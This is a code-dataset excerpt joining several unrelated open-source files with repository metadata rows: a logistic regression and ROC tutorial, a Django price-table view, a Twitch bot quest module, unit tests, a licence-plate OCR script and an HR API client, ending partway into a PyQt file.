plt.scatter(x,prob, color='orange', label="로지스틱 회귀", s=1)
plt.axhline(y=0.5, color='red', label='결정선')
plt.ylim((-0.1,1.1))
plt.legend(loc=(0.05, 0.75))
plt.savefig(png_path + '/logistic_scatterWithlogisticCurve.png')
plt.show()
#
# Meaning of the cost function
#
h = np.linspace(0.00001,1, 1000)
loss = -np.log(h)
plt.figure(figsize=(6,4))
plt.scatter(h, loss, s=1)
plt.xlabel("h")
plt.ylabel('cost=-log(h)')
plt.title('h vs. cost Scatter Plot with y=1')
plt.tight_layout()
plt.savefig(png_path + '/logistic_costFunction.png')
plt.show()
#
# Understanding the ROC curve algorithm
#
# Construct the data
# predicted probabilities
y_score = np.array([0.3, 0.4, 0.55, 0.75, 0.97])
# actual target values
y_true = np.array([0, 1, 0, 1, 1 ])
# indices that sort the predicted probabilities in descending order
ix = np.argsort(y_score)[::-1]
# cumulative counts over the descending-sorted target values
fps = np.cumsum(y_true[ix] == 0)
tps = np.cumsum(y_true[ix] == 1)
# prepend 0 so the curve starts at (0, 0)
tps = np.r_[0, tps]
fps = np.r_[0, fps]
# normalise by the total counts of events and non-events
fpr = fps / fps[-1]
tpr = tps / tps[-1]
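# Worked through for the toy data above: sorted by descending score the labels
# are [1, 1, 0, 1, 0], so tps = [0, 1, 2, 2, 3, 3] and fps = [0, 0, 0, 1, 1, 2],
# giving tpr = tps / 3 and fpr = fps / 2.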
# plot using fpr and tpr
plt.figure(figsize=(6, 6))
plt.plot(fpr, tpr)
plt.plot([-0.02, 1.02], [-0.02, 1.02], color='gray', linestyle=':') # random-guess baseline
plt.margins(0) # gap between the plotted data and the axes
plt.xlabel('fpr: 1-Specificity')
plt.ylabel('tpr: Sensitivity')
plt.title("ROC Curve", weight='bold')
plt.savefig(png_path + '/logistic_ROC_scratch.png')
plt.show()
#
# Example: fitting a logistic regression on the [BANK] data
#
# Fetch the data
path = 'https://archive.ics.uci.edu/ml/machine-learning-databases/00222/'
zip_url = path + 'bank.zip'
z = zipfile.ZipFile(io.BytesIO(requests.get(zip_url).content)) # open the zip archive
z.infolist() # list the members inside the zip
df = pd.read_csv(z.open('bank.csv'),sep=';') # read the desired member
df.columns
# Understanding get_dummies for building dummy variables
pd.get_dummies([0,1,0,1,2])
# 0 1 2
# 0 1 0 0
# 1 0 1 0
# 2 1 0 0
# 3 0 1 0
# 4 0 0 1
pd.get_dummies([0,1,0,1,2], drop_first=True)
# 1 2
# 0 0 0
# 1 1 0
# 2 0 0
# 3 1 0
# 4 0 1
# Replace the string target with a numeric variable
df['num_y'] = pd.get_dummies(df['y'], drop_first=True)
# Get the categorical variable names
categorical_vars = df.drop(['y', 'num_y'], axis=1).columns[df.drop(['y', 'num_y'], axis=1).dtypes == 'object']
# Get the numeric variable names
num_vars = df.drop(['y', 'num_y'], axis=1).columns[df.drop(['y', 'num_y'], axis=1).dtypes != 'object']
# Build dummy variables for the categorical variables
dumm_data = pd.get_dummies(df[categorical_vars], prefix_sep='_', drop_first=True)
# Build the input features from the dummy and numeric variables only
Xdf = df.join(dumm_data)[num_vars.tolist() + dumm_data.columns.tolist()]
X = Xdf.values
# Build the target variable
y = df['num_y'].values
# Split the data
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3)
# Fit the logistic regression model
logisticModel = LogisticRegression(random_state=123)
logisticModel.fit(X_train, y_train)
# Fitted results
logisticModel.coef_
logisticModel.intercept_
# Prediction
logisticModel.predict(X_test)
logisticModel.predict_proba(X_test)
df['num_y'].value_counts()
predicted = logisticModel.predict(X_test)
pd.Series(predicted).value_counts()
score = logisticModel.score(X_test, y_test) # returns mean accuracy (correct-classification rate)
# 0.8983050847457628
# prob = logisticModel.predict_proba(X_test)[:, 1]
# confusion matrix
metrics.confusion_matrix(y_test, predicted)
# array([[1171, 28],
# [ 110, 48]], dtype=int64)
#
# Draw the ROC curve
#
# Compute the predicted probabilities from the model
y_pred_proba = logisticModel.predict_proba(X_test)[::, 1]
# compute fpr (1 - specificity), tpr (sensitivity), and the AUC
fpr, tpr, _ = metrics.roc_curve(y_true=y_test, y_score=y_pred_proba)
auc = metrics.roc_auc_score(y_test, y_pred_proba)
# Create the ROC plot
plt.figure(figsize=(6, 6))
plt.plot(fpr, tpr, label="로지스틱 회귀\n곡선밑 면적(AUC)=" + "%.4f" % auc)
plt.plot([-0.02, 1.02], [-0.02, 1.02], color='gray', linestyle=':', label='무작위 모델')
plt.margins(0)
plt.legend(loc=4)
plt.xlabel('fpr: 1-Specificity')
plt.ylabel('tpr: Sensitivity')
# plt.axhline(y=0.7, color='red', label='민감도 기준선')
# plt.axvline(x=0.2, color='green', label='1-특이도 기준선')
plt.title("ROC Curve", weight='bold')
plt.legend()
plt.savefig(png_path + '/logistic_ROC2.png')
plt.show()
| [
"[email protected]"
] | |
2704840558c8b5a61a9cdc328fdc4c88c17852d6 | c91d029b59f4e6090a523bf571b3094e09852258 | /src/comercial/views/tabela_de_preco.py | 8d55cd86e2acf528caf034482365982811ed0587 | [
"MIT"
] | permissive | anselmobd/fo2 | d51b63ebae2541b00af79448ede76b02638c41f0 | 8e7f8f3d9a296c7da39d0faf38a266e9c6c162ab | refs/heads/master | 2023-08-31T19:59:33.964813 | 2023-08-31T19:50:53 | 2023-08-31T19:50:53 | 92,856,677 | 1 | 0 | MIT | 2023-04-21T21:50:46 | 2017-05-30T17:04:27 | Python | UTF-8 | Python | false | false | 4,518 | py | from pprint import pprint
from django.shortcuts import render
from django.urls import reverse
from django.views import View
from fo2.connections import db_cursor_so
import comercial.forms as forms
import comercial.queries as queries
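# Hedged sketch (assumed, not shown in this file): a urls.py entry matching the
# reverse('comercial:tabela_de_preco__get', ...) call used in mount_context below:
#   path('tabela_de_preco/<tabela>/', TabelaDePreco.as_view(),
#        name='tabela_de_preco__get')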
class TabelaDePreco(View):
def __init__(self):
super().__init__()
self.Form_class = forms.TabelaDePrecoForm
self.template_name = 'comercial/tabela_de_preco.html'
self.title_name = 'Tabela de preços'
def mount_context(self, cursor, tabela):
context = {'tabela': tabela}
codigo_tabela_chunks = tabela.split('.')
if len(codigo_tabela_chunks) != 3:
context.update({
'erro': 'Código inválido. '
'3 números inteiros separados por ".".'
})
data = queries.get_tabela_preco(cursor, order='a')
if len(data) == 0:
context.update({'erro': 'Sem tabelas de preço'})
return context
for row in data:
row['tabela'] = "{:02d}.{:02d}.{:02d}".format(
row['col_tabela_preco'],
row['mes_tabela_preco'],
row['seq_tabela_preco'],
)
row['tabela|LINK'] = reverse(
'comercial:tabela_de_preco__get',
args=[row['tabela']]
)
row['data_ini_tabela'] = row['data_ini_tabela'].date()
row['data_fim_tabela'] = row['data_fim_tabela'].date()
context.update({
'headers': [
'Tabela',
'Descrição',
'Início',
'Fim',
],
'fields': [
'tabela',
'descricao',
'data_ini_tabela',
'data_fim_tabela',
],
'data': data,
})
return context
for subcodigo_tabela in codigo_tabela_chunks:
if not subcodigo_tabela.isdigit():
context.update({
'erro': 'Cada subcódigo deve ser um número inteiro.'
})
return context
codigo_tabela_ints = list(map(int, codigo_tabela_chunks))
tabela = "{:02d}.{:02d}.{:02d}".format(*codigo_tabela_ints)
context = {'tabela': tabela}
data = queries.get_tabela_preco(cursor, *codigo_tabela_ints)
if len(data) == 0:
context.update({'erro': 'Tabela não encontrada'})
return context
for row in data:
row['data_ini_tabela'] = row['data_ini_tabela'].date()
row['data_fim_tabela'] = row['data_fim_tabela'].date()
context.update({
'headers': [
'Descrição',
'Início',
'Fim',
],
'fields': [
'descricao',
'data_ini_tabela',
'data_fim_tabela',
],
'data': data,
})
i_data = queries.itens_tabela_preco(cursor, *codigo_tabela_ints)
if len(i_data) == 0:
context.update({'erro': 'Tabela vazia'})
return context
context.update({
'i_headers': [
'Referência',
'Descrição',
'Valor',
],
'i_fields': [
'grupo_estrutura',
'descr_referencia',
'val_tabela_preco'
],
'i_data': i_data,
})
return context
def get(self, request, *args, **kwargs):
if 'tabela' in kwargs:
return self.post(request, *args, **kwargs)
else:
context = {'titulo': self.title_name}
form = self.Form_class()
context['form'] = form
return render(request, self.template_name, context)
def post(self, request, *args, **kwargs):
context = {'titulo': self.title_name}
form = self.Form_class(request.POST)
form.data = form.data.copy()
if 'tabela' in kwargs:
form.data['tabela'] = kwargs['tabela']
if form.is_valid():
tabela = form.cleaned_data['tabela']
cursor = db_cursor_so(request)
context.update(self.mount_context(cursor, tabela))
context['form'] = form
return render(request, self.template_name, context)
| [
"[email protected]"
] | |
ae678eb02ca8de59e362c11fec61c9695fa5694d | 93a68ff3fe2bcf46827d55a3f90f983376d19984 | /pajbot/modules/quest.py | 60a19c187e509b88293f062ed108d329bc9a6015 | [
"MIT"
] | permissive | cubelious/pajbot | 8abe0b9239c1a1ce90671f69e75bec5d9114f9e5 | 53db8f8cfe7e3fa405ef088a23010e4d833891c6 | refs/heads/master | 2021-01-25T02:30:41.791769 | 2016-02-08T15:47:30 | 2016-02-08T15:47:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,413 | py | import logging
import random
from pajbot.modules import BaseModule, ModuleSetting
from pajbot.models.command import Command
from pajbot.models.handler import HandlerManager
from pajbot.managers import RedisManager
from pajbot.tbutil import find
from pajbot.streamhelper import StreamHelper
log = logging.getLogger(__name__)
class QuestModule(BaseModule):
ID = __name__.split('.')[-1]
NAME = 'Quest system'
DESCRIPTION = 'Give users a single quest at the start of each day'
SETTINGS = []
def __init__(self):
super().__init__()
self.current_quest = None
def my_progress(self, **options):
bot = options['bot']
source = options['source']
if self.current_quest is not None:
quest_progress = source.get_quest_progress()
if quest_progress is not False:
bot.say('Your current quest progress is {}'.format(quest_progress))
else:
bot.say('You have no progress on the current quest.')
else:
bot.say('There is no quest active right now.')
def get_current_quest(self, **options):
bot = options['bot']
if self.current_quest is not None:
bot.say('Current quest active: {0.NAME} - {1}'.format(self.current_quest, self.current_quest.get_objective()))
else:
bot.say('There is no quest active right now.')
def get_user_tokens(self, **options):
bot = options['bot']
source = options['source']
bot.say('{} has {} tokens'.format(source.username_raw, source.get_tokens()))
def load_commands(self, **options):
self.commands['myprogress'] = Command.raw_command(self.my_progress)
self.commands['currentquest'] = Command.raw_command(self.get_current_quest)
self.commands['quest'] = self.commands['currentquest']
self.commands['tokens'] = Command.raw_command(self.get_user_tokens)
def on_stream_start(self):
available_quests = list(filter(lambda m: m.ID.startswith('quest-'), self.submodules))
if len(available_quests) == 0:
log.error('No quests enabled.')
return False
self.current_quest = random.choice(available_quests)
self.current_quest.start_quest()
redis = RedisManager.get()
redis.set(self.current_quest_key, self.current_quest.ID)
self.bot.say('Stream started, new quest has been chosen!')
self.bot.say('Current quest objective: {}'.format(self.current_quest.get_objective()))
def on_stream_stop(self):
if self.current_quest is None:
log.info('No quest active on stream stop.')
return False
self.current_quest.stop_quest()
self.current_quest = None
self.bot.say('Stream ended, quest has been reset.')
redis = RedisManager.get()
# Remove any mentions of the current quest
redis.delete(self.current_quest_key)
last_stream_id = StreamHelper.get_last_stream_id()
if last_stream_id is False:
log.error('No last stream ID found.')
# No last stream ID found. why?
return False
# XXX: Should we use a pipeline for any of this?
# Go through user tokens and remove any from more than 2 streams ago
for key in redis.keys('{streamer}:*:tokens'.format(streamer=StreamHelper.get_streamer())):
all_tokens = redis.hgetall(key)
for stream_id_str in all_tokens:
try:
stream_id = int(stream_id_str)
except (TypeError, ValueError):
log.error('Invalid stream id in tokens by {}'.format(key))
continue
if last_stream_id - stream_id > 1:
log.info('Removing tokens for stream {}'.format(stream_id))
redis.hdel(key, stream_id)
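        # Redis key layout assumed by this module (illustrative values):
        #   "<streamer>:current_quest"  -> active quest module ID (e.g. "quest-...")
        #   "<streamer>:<user>:tokens"  -> hash mapping stream_id -> token count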
def on_loaded(self):
if self.bot:
self.current_quest_key = '{streamer}:current_quest'.format(streamer=self.bot.streamer)
def on_managers_loaded(self):
if self.current_quest is None:
redis = RedisManager.get()
current_quest_id = redis.get(self.current_quest_key)
log.info('Try to load submodule with ID {}'.format(current_quest_id))
if current_quest_id is not None:
current_quest_id = current_quest_id.decode('utf8')
quest = find(lambda m: m.ID == current_quest_id, self.submodules)
if quest is not None:
log.info('Resumed quest {}'.format(quest.get_objective()))
self.current_quest = quest
self.current_quest.start_quest()
else:
log.info('No quest with id {} found in submodules ({})'.format(current_quest_id, self.submodules))
def enable(self, bot):
HandlerManager.add_handler('on_stream_start', self.on_stream_start)
HandlerManager.add_handler('on_stream_stop', self.on_stream_stop)
HandlerManager.add_handler('on_managers_loaded', self.on_managers_loaded)
self.bot = bot
def disable(self, bot):
HandlerManager.remove_handler('on_stream_start', self.on_stream_start)
HandlerManager.remove_handler('on_stream_stop', self.on_stream_stop)
HandlerManager.remove_handler('on_managers_loaded', self.on_managers_loaded)
| [
"[email protected]"
] | |
12ecee822cc835c4a06bd011e3765246a6c67b7e | 628ae3506d28acc472c39d5452b675e3f1d4f4ac | /tests/test_statements.py | 43bfe4ed545a252f7fa8ed41a7b2ebe6fcee671b | [] | no_license | jucacrispim/sol | 6be9aad187a1d2367ccd2a59347817ef0162954b | 2c001812559ea586d2532d81f475f379a38b7b7d | refs/heads/master | 2021-06-23T11:41:31.448769 | 2019-10-21T06:28:22 | 2019-10-21T06:28:22 | 216,483,311 | 0 | 0 | null | 2021-04-20T18:47:42 | 2019-10-21T05:18:54 | Python | UTF-8 | Python | false | false | 2,303 | py | # -*- coding: utf-8 -*-
from unittest.mock import Mock
import pytest
from sol import statements
def test_statement():
statement = statements.Statement()
with pytest.raises(NotImplementedError):
statement({})
def test_say(mocker):
mocker.patch.object(statements, 'print', Mock(spec=print))
say = statements.Say('hei')
say({})
assert statements.print.called
def test_say_context_var(mocker):
mocker.patch.object(statements, 'print', Mock(spec=print))
say = statements.Say('hei {oi}')
say({'oi': 'ola'})
assert statements.print.call_args[0][0] == 'hei ola'
def test_ask(mocker):
mocker.patch.object(statements, 'print', Mock(spec=print))
mocker.patch.object(statements, 'input', Mock(spec=input,
return_value='oi'))
ask = statements.Ask('what?', 'oque')
r = ask({})
assert r == {'oque': 'oi'}
def test_if_true(mocker):
mocker.patch.object(statements, 'print', Mock(spec=print))
mocker.patch.object(statements, 'input', Mock(spec=input,
return_value='oi'))
cond = 'a == 1'
true_body = [('ask', 'ok?', 'ok')]
false_body = [('say', 'ok!')]
stmt = statements.If(cond, true_body, false_body)
context = {'a': 1}
stmt(context)
assert statements.input.called
def test_if_false(mocker):
mocker.patch.object(statements, 'print', Mock(spec=print))
mocker.patch.object(statements, 'input', Mock(spec=input,
return_value='oi'))
cond = 'a == 1'
true_body = [('ask', 'ok?', 'ok')]
false_body = [('say', 'ok!')]
stmt = statements.If(cond, true_body, false_body)
context = {'a': 2}
stmt(context)
assert not statements.input.called
def test_call():
expr = 'len("asdf")'
var = 'a'
stmt = statements.Call(expr, var)
context = stmt({})
assert context['a'] == 4
def test_exists_true():
var = '{a}'
stmt = statements.Exists(var, 'e')
context = {'a': 1}
context = stmt(context)
assert context['e'] is True
def test_exists_false():
var = '{a}'
stmt = statements.Exists(var, 'e')
context = {}
context = stmt(context)
assert context['e'] is False
| [
"[email protected]"
] | |
2d3d6fbdc5f2f1467114efc7cf5d20bee744c112 | de6e1bc6d0de103685c97a5124c15392e887a6ca | /Project300/useraccount/views.py | 8e478a6fd170855e328d4749f25befbe2ff14b83 | [] | no_license | rahmanrafi32/CholoGhureAshi | 474dabc3f6533f822ef8208cb45220276dd68fb5 | 16d213fcd39db163ab733ad05b0d59cbfbb4fabd | refs/heads/master | 2023-02-06T17:47:37.989236 | 2020-12-28T08:14:22 | 2020-12-28T08:14:22 | 324,951,124 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 120 | py | from django.shortcuts import render
# Create your views here.
def reg(request):
return render(request,"login.html") | [
"rafi.rahman03@yahoo,com"
] | rafi.rahman03@yahoo,com |
4b99d00e8213449a75885322365206396326fa5c | 155b520361166c0033853578ad6c13dd41a1e168 | /data-from-machinery-master/static/Dataset/Model/Number_plate_detection.py | bf04526057b40bc53cc68f8e72d906eefab5f08e | [] | no_license | NiraliLimbad/Data-from-machinery | 8ae5772b5c4e5085463527d543d3ff01e902639b | b4cd9030edc6667192921e27af0501aa32137d4f | refs/heads/main | 2023-06-01T20:14:07.869313 | 2021-06-19T11:31:58 | 2021-06-19T11:31:58 | 378,395,734 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,658 | py | import cv2
from PIL import Image, ImageEnhance, ImageFilter
import numpy as np
import pytesseract  # required by the OCR calls in recognize()/detect()/detect_LP()
import os
import time
import imutils
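# Assumption (not stated in this file): pytesseract needs the Tesseract OCR binary
# installed and on PATH; on Windows it can be pointed at explicitly, e.g.
#   pytesseract.pytesseract.tesseract_cmd = r'C:\Program Files\Tesseract-OCR\tesseract.exe'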
def cleanPlate(plate):
print ("CLEANING PLATE. . .")
gray = cv2.cvtColor(plate, cv2.COLOR_BGR2GRAY)
# gray = cv2.GaussianBlur(gray,(3,3),0)
#kernel = cv2.getStructuringElement(cv2.MORPH_CROSS, (3, 3))
#thresh= cv2.dilate(gray, kernel, iterations=1)
# _, thresh = cv2.threshold(gray, 125, 255, cv2.THRESH_BINARY)
# ret3,thresh = cv2.threshold(gray,0,255,cv2.THRESH_BINARY+cv2.THRESH_OTSU)
thresh = cv2.adaptiveThreshold(gray,255,cv2.ADAPTIVE_THRESH_GAUSSIAN_C,cv2.THRESH_BINARY,11,2)
# cv2.imshow("thre",thresh)
# cv2.waitKey(0)
# thresh = gray
# cv2.imshow("thre",thresh)
# cv2.waitKey(0)
contours,hierarchy = cv2.findContours(thresh.copy(),cv2.RETR_TREE, cv2.CHAIN_APPROX_NONE)
# cv2.drawContours(gray,contours,-1,[0,255,0],3)
#
# cv2.imshow("contour",gray)
# cv2.waitKey(0)
if contours:
areas = [cv2.contourArea(c) for c in contours]
max_index = np.argmax(areas)
max_cnt = contours[max_index]
max_cntArea = areas[max_index]
x,y,w,h = cv2.boundingRect(max_cnt)
# if not ratioCheck(max_cntArea,w,h):
# return plate,None
cleaned_final = thresh[y:y+h, x:x+w]
# cv2.imshow("Function Test",cleaned_final)
# cv2.waitKey(0)
return cleaned_final,[x,y,w,h]
else:
return plate,None
def ratioCheck(area, width, height):
ratio = float(width) / float(height)
if ratio < 1:
ratio = 1 / ratio
aspect = 4.7272
min = 15*aspect*15 # minimum area
max = 125*aspect*125 # maximum area
rmin = 3
rmax = 6
if (area < min or area > max) or (ratio < rmin or ratio > rmax):
return False
return True
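# Worked example (illustrative): a 120x30 px candidate has area 3600 and aspect
# ratio 4.0, which passes the bounds above (min area ~1063, max area ~73863, 3 <= ratio <= 6).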
def isMaxWhite(plate):
    avg = np.mean(plate)
    if(avg>=115):
        return True
    else:
        # NB: this branch also returns True, so the whiteness check is
        # effectively disabled and every candidate plate passes
        return True
def recognize():
img = cv2.imread('test.jpg',cv2.IMREAD_COLOR)
img = cv2.resize(img, (620,480) )
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY) #convert to grey scale
cv2.imshow('image',gray)
cv2.waitKey(0)
gray = cv2.bilateralFilter(gray, 11, 17, 17) #Blur to reduce noise
cv2.imshow('image',gray)
cv2.waitKey(0)
edged = cv2.Canny(gray, 30, 200) #Perform Edge detection
cv2.imshow('image',edged)
cv2.waitKey(0)
# find contours in the edged image, keep only the largest
# ones, and initialize our screen contour
cnts = cv2.findContours(edged.copy(), cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
cnts = imutils.grab_contours(cnts)
cnts = sorted(cnts, key = cv2.contourArea, reverse = True)[:10]
screenCnt = None
# loop over our contours
for c in cnts:
# approximate the contour
peri = cv2.arcLength(c, True)
approx = cv2.approxPolyDP(c, 0.018 * peri, True)
# if our approximated contour has four points, then
# we can assume that we have found our screen
if len(approx) == 4:
screenCnt = approx
break
if screenCnt is None:
detected = 0
print ("No contour detected")
else:
detected = 1
if detected == 1:
cv2.drawContours(img, [screenCnt], -1, (0, 255, 0), 3)
cv2.imshow('image',img)
cv2.waitKey(0)
# Masking the part other than the number plate
mask = np.zeros(gray.shape,np.uint8)
new_image = cv2.drawContours(mask,[screenCnt],0,255,-1,)
new_image = cv2.bitwise_and(img,img,mask=mask)
cv2.imshow('image',new_image)
cv2.waitKey(0)
# Now crop
(x, y) = np.where(mask == 255)
(topx, topy) = (np.min(x), np.min(y))
(bottomx, bottomy) = (np.max(x), np.max(y))
Cropped = gray[topx:bottomx+1, topy:bottomy+1]
cv2.imshow('image',new_image)
cv2.waitKey(0)
#Read the number plate
text = pytesseract.image_to_string(Cropped, config='--psm 11')
print("Detected Number is:",text)
cv2.imshow('image',img)
cv2.imshow('Cropped',Cropped)
cv2.waitKey(0)
cv2.destroyAllWindows()
def detect(image,temp):
face_cascade = cv2.CascadeClassifier('licence_plate.xml')
# image = cv2.imread(image)
# image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
print(image)
faces = face_cascade.detectMultiScale(image, 1.2, 5)
print(faces)
for (x, y, w, h) in faces:
#img = cv2.rectangle(image,(x,y),(x+w,y+h),(255,0,0),2)
img = image[y:y+h,x:x+w]
#img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
if(isMaxWhite(img)):
#img = cv2.bilateralFilter(img, 11, 25, 25)
clean_plate, rect = cleanPlate(img)
if rect:
x1,y1,w1,h1 = rect
#x,y,w,h=x1,y+y1,w1,h1
cv2.imshow("Cleaned Plate",clean_plate)
cv2.waitKey(0)
plate_im = Image.fromarray(clean_plate)
text = pytesseract.image_to_string(plate_im, config='-c tessedit_char_whitelist=0123456789abcdefghijklmnopqrstuvwxyz --psm 9',lang='eng')
print ("Detected Text : ",text)
font = cv2.FONT_HERSHEY_SIMPLEX
bottomLeftCornerOfText = (x,y-10)
fontScale = 1
fontColor = (0,255,0)
lineType = 2
img = cv2.rectangle(temp,(x,y),(x+w,y+h),(0,255,0),2)
cv2.putText(temp,text,bottomLeftCornerOfText, font, fontScale, fontColor, lineType)
cv2.imshow("Detected Plate",temp)
cv2.waitKey(0)
cv2.destroyAllWindows()
# img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
#
#
# gray = img
# gray = cv2.bilateralFilter(gray, 11, 17, 17)
#
#
#
# cv2.imshow("camera",gray)
# cv2.waitKey(0)
#
#
# text = pytesseract.image_to_string(gray,config='-c tessedit_char_whitelist=0123456789abcdefghijklmnopqrstuvwxyz --psm 9', lang='eng')
#
# print(text)
# cv2.putText(image, text, (x, y - 5), cv2.FONT_HERSHEY_SIMPLEX,0.5, [0,255,0], 2)
#
#
# cv2.imshow("camera",image)
# cv2.waitKey(0)
# cv2.destroyAllWindows()
def detect_LP(image,temp):
labelsPath = os.path.sep.join(['RSAD/static/Dataset/Model/yolo_v3_lic_plt', "coco.names"])
LABELS = open(labelsPath).read().strip().split("\n")
np.random.seed(42)
COLORS = np.random.randint(0, 255, size=(len(LABELS), 3),dtype="uint8")
weightsPath = os.path.sep.join(['RSAD/static/Dataset/Model/yolo_v3_lic_plt', "yolov3.weights"])
configPath = os.path.sep.join(['RSAD/static/Dataset/Model/yolo_v3_lic_plt', "yolov3.cfg"])
# print("[INFO] loading YOLO from disk...")
net = cv2.dnn.readNetFromDarknet(configPath, weightsPath)
# image = cv2.imread(image)
# temp = cv2.imread(temp)
(H, W) = image.shape[:2]
ln = net.getLayerNames()
ln = [ln[i[0] - 1] for i in net.getUnconnectedOutLayers()]
blob = cv2.dnn.blobFromImage(image, 1 / 255.0, (416, 416),swapRB=True, crop=False)
net.setInput(blob)
start = time.time()
layerOutputs = net.forward(ln)
end = time.time()
# show timing information on YOLO
# print("[INFO] YOLO took {:.6f} seconds".format(end - start))
boxes = []
confidences = []
classIDs = []
# loop over each of the layer outputs
for output in layerOutputs:
# loop over each of the detections
for detection in output:
# extract the class ID and confidence (i.e., probability) of
# the current object detection
scores = detection[5:]
classID = np.argmax(scores)
confidence = scores[classID]
# filter out weak predictions by ensuring the detected
# probability is greater than the minimum probability
if confidence > 0.5:
# scale the bounding box coordinates back relative to the
# size of the image, keeping in mind that YOLO actually
# returns the center (x, y)-coordinates of the bounding
# box followed by the boxes' width and height
box = detection[0:4] * np.array([W, H, W, H])
(centerX, centerY, width, height) = box.astype("int")
# use the center (x, y)-coordinates to derive the top and
# and left corner of the bounding box
x = int(centerX - (width / 2))
y = int(centerY - (height / 2))
# update our list of bounding box coordinates, confidences,
# and class IDs
boxes.append([x, y, int(width), int(height)])
confidences.append(float(confidence))
classIDs.append(classID)
idxs = cv2.dnn.NMSBoxes(boxes, confidences, 0.5,0.3)
# print(boxes)
# print(classIDs)
if len(idxs) > 0:
# loop over the indexes we are keeping
for i in idxs.flatten():
# print(i)
# xtract the bounding box coordinates
(x, y) = (boxes[i][0], boxes[i][1])
(w, h) = (boxes[i][2], boxes[i][3])
# draw a bounding box rectangle and label on the image
color = [int(c) for c in COLORS[classIDs[i]]]
cv2.rectangle(temp, (x, y), (x + w, y + h), color, 2)
#text = "{}: {:.4f}".format(LABELS[classIDs[i]], confidences[i])
#cv2.putText(temp, text, (x, y - 5), cv2.FONT_HERSHEY_SIMPLEX,0.5, color, 2)
img = image[y:y+h,x:x+w]
img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
gray = img
# gray = cv2.adaptiveThreshold(gray,255,cv2.ADAPTIVE_THRESH_GAUSSIAN_C,cv2.THRESH_BINARY,11,2)
gray = cv2.bilateralFilter(gray, 11, 17, 17)
#
# cv2.imshow("camera",gray)
# cv2.waitKey(0)
#
#
text = pytesseract.image_to_string(gray,config='-c tessedit_char_whitelist=0123456789abcdefghijklmnopqrstuvwxyz --psm 9', lang='eng')
# print(text)
cv2.putText(temp, text, (x, y - 5), cv2.FONT_HERSHEY_SIMPLEX,0.5, [0,255,0], 2)
#
# cv2.imshow("camera",image)
# cv2.waitKey(0)
# cv2.destroyAllWindows()
#
def google_api():
from google.cloud import vision
from google.cloud.vision import types
import io
image_uri = '/Thunder/YOLO_object_detection/images/car7.jpg'
client = vision.ImageAnnotatorClient.from_service_account_file('lp-detection.json')
with io.open(image_uri,'rb') as image_file:
content = image_file.read()
image = vision.types.Image(content=content)
t = client.text_detection(image=image)
if __name__ == '__main__':
# recognize()
    # detect_LP() expects image arrays (its internal cv2.imread calls are commented out)
    test_img = cv2.imread('11.jpg')
    detect_LP(test_img, test_img.copy())
# google_api() | [
"[email protected]"
] | |
11037e6cb64fd815fafcf2e8aee20a29b640aca2 | 68ebf4ffa77442eaafaf0e45d77c3bf72b867e54 | /itdblib/common/hr_intf.py | 06ee85cfb49afd710544da45fdb085e3bf75b897 | [] | no_license | wzqwsrf/itdb | 39fa5dafeb0da555930b9a5c5dd1d9a4918a5aa7 | 7dcbc21c32c96fcfdcdbd574b50ad85e82263fc7 | refs/heads/master | 2016-09-05T11:31:17.764488 | 2015-09-10T08:51:25 | 2015-09-10T08:51:25 | 42,232,261 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,157 | py | # !/usr/bin/env python
# -*- coding: utf-8 -*-
# author: wangzq <[email protected]>
import json
import urllib2
from oslo_config import cfg
from qg.core import log as logging
LOG = logging.getLogger(__name__)
interface_opt = [
cfg.StrOpt('hr_one_intf',
default='',
help='fetch one'),
cfg.StrOpt('hr_all_intf',
default='',
help='fetch all'),
cfg.StrOpt('hr_auto_intf',
default='',
help='hr_auto_intf')
]
CONF = cfg.CONF
CONF.register_opts(interface_opt, 'INTERFACE')
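# Example [INTERFACE] section of the service config file (URLs are illustrative
# placeholders, not the real endpoints):
#   [INTERFACE]
#   hr_one_intf  = http://hr.example.com/api/employee?rtx_id=
#   hr_all_intf  = http://hr.example.com/api/employees
#   hr_auto_intf = http://hr.example.com/api/auto?id=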
__all__ = (
    'fetch_info_by_id',
    'fetch_info',
    'fetch_all_infos'
)
def fetch_info_by_id(param, id):
return fetch_info(param + id)
def auto_show_employee_info(id):
""" get all employee infos
"""
retDict = {}
url = CONF.INTERFACE.hr_auto_intf + id
retDict = call_http_intf(url)
return retDict
def fetch_info(param):
""" @param: rtx_id
"""
retDict = {}
try:
LOG.info("current rtx_id is : %s" % param)
url = CONF.INTERFACE.hr_one_intf
url = "%s%s" % (url, param)
except Exception as _ex:
LOG.error("error occured while format url: %s" % str(_ex))
return retDict
retDict = call_http_intf(url)
return retDict
def fetch_all_infos():
""" get all employee infos
"""
retDict = {}
url = CONF.INTERFACE.hr_all_intf
retDict = call_http_intf(url)
return retDict
def call_http_intf(url):
""" method: GET
"""
retDict = {}
try:
request = urllib2.Request(url)
retVal = urllib2.urlopen(request, timeout=20)
except urllib2.HTTPError as _ex:
LOG.error("The server couldn't fullfill the request")
LOG.error("Error code : %s" % str(_ex))
return retDict
except urllib2.URLError as _ex:
LOG.error("fetch the url content is error")
LOG.error("Error code : %s" % str(_ex))
return retDict
except Exception as _ex:
LOG.error("error occured while fetch one info: %s" % str(_ex))
return retDict
else:
res = retVal.read()
retDict = json.loads(res)
return retDict
| [
"[email protected]"
] | |
17e17767199549253f2047b58f7b8b665c882ca6 | dc87e2ad75edd66ef1da331bf4d464a20975ab3e | /main.py | 9c05273e01a16a0043dc4dbd720ab78f6da496ae | [] | no_license | DanilUryadnikov/Homewrok | 0488bf3ecf5ff980ff821a5be0bd9131c7bc983a | 97d4ddef86831df1afd3c6783921d6911f9f653f | refs/heads/master | 2023-02-03T15:44:30.257174 | 2020-12-24T10:53:35 | 2020-12-24T10:53:35 | 324,134,993 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,033 | py | import sys
from PyQt5.QtGui import QPainter, QColor
from PyQt5 import uic
from PyQt5.QtWidgets import QApplication, QMainWindow
import random
class round(QMainWindow):  # NB: the class name shadows the builtin round(); kept as in the original
